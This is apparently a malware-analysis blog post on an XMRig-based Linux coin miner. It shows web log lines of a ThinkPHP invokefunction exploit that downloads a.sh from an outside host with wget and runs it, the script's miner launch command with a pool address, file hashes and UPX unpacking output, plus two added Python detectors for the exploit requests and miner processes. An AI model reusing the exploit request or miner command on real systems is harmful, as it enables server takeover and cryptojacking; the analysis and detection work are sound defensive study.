Coin mining malware based on XMRig (ELF) | Joachim De Zutter
March 2019

Logs:
2019-03-02 08:24:08.422937 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:08.939645 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:09.579733 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:10.859991 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:13.423866 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:18.548630 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
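The six requests above all carry the same payload: the ThinkPHP `invokefunction` path with `call_user_func_array` mapped to `system`, and a command that fetches a script into /tmp and runs it. The detector below is an added example written for this post, not the author's tooling: it parses lines in the same format as the log excerpt, URL-decodes the request path, flags the invokefunction pattern, and pulls out the source IP, the PHP function used, the download URL and the dropped file path so they can be blocked or hunted for. It goes slightly beyond the page by also matching the other PHP command-execution functions (`exec`, `shell_exec`, `passthru`, `popen`) in `vars[0]`. The sample input reuses two of the log lines shown above plus one constructed benign request from a documentation address.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Two requests copied from the log excerpt in the post, plus one constructed
# benign request (198.51.100.7 is a documentation address) to show a non-match.
SAMPLE_LOG = r"""2019-03-02 08:24:08.422937 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:24:08.939645 IP 47.93.117.4 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
2019-03-02 08:25:00.000000 IP 198.51.100.7 GET /index.php?s=/index/article/view&id=12 HTTP/1.1
"""

# Line layout as shown in the post: "<date> <time> IP <addr> <method> <path> HTTP/x.y"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$"
)
# PHP functions that run an OS command when reached through call_user_func_array.
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen")
FUNC_RE = re.compile(r"vars\[0\]=(" + "|".join(EXEC_FUNCS) + r")\b")
CMD_RE = re.compile(r"vars\[1\]\[\]=([^&]*)")          # the command handed to that function
URL_RE = re.compile(r"https?://[^\s;'\"]+")             # download URLs inside the command
OUTFILE_RE = re.compile(r"-O\s+([^\s;]+)")             # wget -O <path>: where the payload lands


def parse_line(line):
    """Split one log line into its fields, or return None if it does not fit the format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze_request(entry):
    """Return a finding for a ThinkPHP invokefunction command-execution request, else None."""
    path = unquote(entry["path"])  # %20 -> space etc., so the command reads as typed
    if "/invokefunction" not in path.lower() or "call_user_func_array" not in path:
        return None
    func = FUNC_RE.search(path)
    cmd = CMD_RE.search(path)
    if not func or not cmd:
        return None
    command = cmd.group(1)
    return {
        "timestamp": entry["ts"],
        "ip": entry["ip"],
        "php_function": func.group(1),
        "command": command,
        "download_urls": URL_RE.findall(command),
        "dropped_paths": OUTFILE_RE.findall(command),
    }


def analyze_log(text):
    """Run the detector over every line of a log and collect the findings."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = analyze_request(entry)
        if finding:
            findings.append(finding)
    return findings


def summarize(findings):
    """Aggregate findings into the indicators an analyst would block or hunt for."""
    return {
        "by_source_ip": Counter(f["ip"] for f in findings),
        "download_urls": sorted({u for f in findings for u in f["download_urls"]}),
        "dropped_paths": sorted({p for f in findings for p in f["dropped_paths"]}),
    }


if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for f in hits:
        print(f["timestamp"], f["ip"], f["php_function"], "->", f["command"])
    print(summarize(hits))
```

Decoding the path before matching matters: the interesting part of the request is percent-encoded, so a rule that looks for `wget http://` in the raw line never fires. The summary gives the three things to act on from this log: the scanning source, the hosting URL for a.sh, and the path the payload is written to on a compromised host.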
File name: a.sh
File size: 616
MD5: 6d3c45fcb8d731ea9d7549b7f7800888
SHA1: 7b42391c50eb487901b5564c3796ad55698b3aec
SHA256: e50ae82bb89d6ddbf8c7b1c00b12777d2ab44a861a4ece9902072853e20e8ed1
VirusTotal report
File name: xmrig_s
File size: 1021704
MD5: e728868c7a70f9f778888c762a2c4406
SHA1: 2d7f25c92ec64a58a6675ea21a9788ff01ccf27d
SHA256: 62131474ebab19c480a7991ea2c995921c9d2842f2e7afbff73676e4b59fc4f3
Apparently this miner is packed with UPX.
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   2951766 <-   1021704   34.61%  linux/ElfAMD   xmrig_s

Unpacked 1 file.
File size: 2949696
MD5: ca77ee60bed091efea90f32c9e0b7c79
SHA1: 70e40363667d15021ff21f6a7f07a8b157f335a4
SHA256: a91dc4defcb569cbd4f1598a35752f527ca9f0389d1e9eeb2b0b9566b3554963
VirusTotal report

Apparently this miner is based on XMRig 2.13.0.

The a.sh script contains:
	if [ "$(ps x | grep -c "xmri[g]")" -lt "1" ]; then
		/tmp/xmrig_s -r 1000 --donate-level 1 -o 119.23.222.239:26590 -B -p pass -k --max-cpu-usage=99 ;
	fi
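The script's own guard (`grep -c "xmri[g]"`) only restarts the miner when no process name containing xmrig is already running. The host-side check below is an added example written for this post, not the author's code: it scores a process command line on the traits visible in the invocation above (a binary executed from /tmp, an xmrig name, XMRig options such as `--donate-level`, `-B`, `-k` and `--max-cpu-usage`, and a `-o host:port` pool endpoint) so that a renamed copy is still caught, while an ordinary process that happens to use `-o` with a file path is not. The miner command line is taken from a.sh; the other three command lines are constructed, and `scan_proc()` reads live `/proc` entries on a Linux host when run there.

```python
import os
import re
import shlex

# Miner invocation copied from the a.sh script in the post.
MINER_CMDLINE = ("/tmp/xmrig_s -r 1000 --donate-level 1 -o 119.23.222.239:26590 "
                 "-B -p pass -k --max-cpu-usage=99")

# Constructed comparison set: a hypothetical renamed copy of the same miner,
# and two ordinary processes that must not be flagged.
SAMPLE_CMDLINES = [
    MINER_CMDLINE,
    "/tmp/.x/kworker -o 10.0.0.5:3333 -B --donate-level 1",
    "/usr/sbin/sshd -D",
    "python3 /opt/app/worker.py -o /var/log/out.txt",
]

# Options used by XMRig-style miners (long and short forms).
MINER_FLAGS = {"--donate-level", "--max-cpu-usage", "-k", "--keepalive", "-B", "--background"}
TMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
POOL_RE = re.compile(r"^(?P<host>[\w.\-]+):(?P<port>\d{2,5})$")  # host:port, not a file path


def assess_cmdline(cmdline):
    """Score one process command line for miner indicators; None for an empty line."""
    argv = shlex.split(cmdline)
    if not argv:
        return None
    indicators, pool = [], None
    exe = argv[0]
    if exe.startswith(TMP_DIRS):
        indicators.append("binary runs from a world-writable temp directory")
    if "xmrig" in os.path.basename(exe).lower():
        indicators.append("executable name contains xmrig")
    for i, arg in enumerate(argv[1:], start=1):
        opt, _, _val = arg.partition("=")  # handles --max-cpu-usage=99
        if opt in MINER_FLAGS:
            indicators.append("miner option " + opt)
        elif opt in ("-o", "--url") and i + 1 < len(argv):
            m = POOL_RE.match(argv[i + 1])
            if m:  # only a host:port value counts; "-o /some/file" is ignored
                pool = (m.group("host"), int(m.group("port")))
                indicators.append("outbound pool endpoint %s:%d" % pool)
    return {
        "cmdline": cmdline,
        "pool": pool,
        "indicators": indicators,
        "likely_miner": len(indicators) >= 2,  # two independent traits to reduce noise
    }


def scan_cmdlines(cmdlines):
    """Assess a list of command lines and return only the ones worth looking at."""
    results = (assess_cmdline(c) for c in cmdlines)
    return [r for r in results if r and r["likely_miner"]]


def scan_proc():
    """Collect command lines of running processes from /proc (Linux only)."""
    cmdlines = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/cmdline" % pid, "rb") as fh:
                raw = fh.read()
        except OSError:
            continue  # process exited or is not readable
        if raw:
            cmdlines.append(" ".join(raw.decode(errors="replace").split("\0")).strip())
    return cmdlines


if __name__ == "__main__":
    for hit in scan_cmdlines(SAMPLE_CMDLINES):
        print(hit["cmdline"], "->", hit["pool"], hit["indicators"])
```

The pool endpoint is the most durable indicator here: the binary name and path are trivial for the operator to change, but the miner must still reach its pool, so the extracted `host:port` is what to feed into egress blocking and network detection.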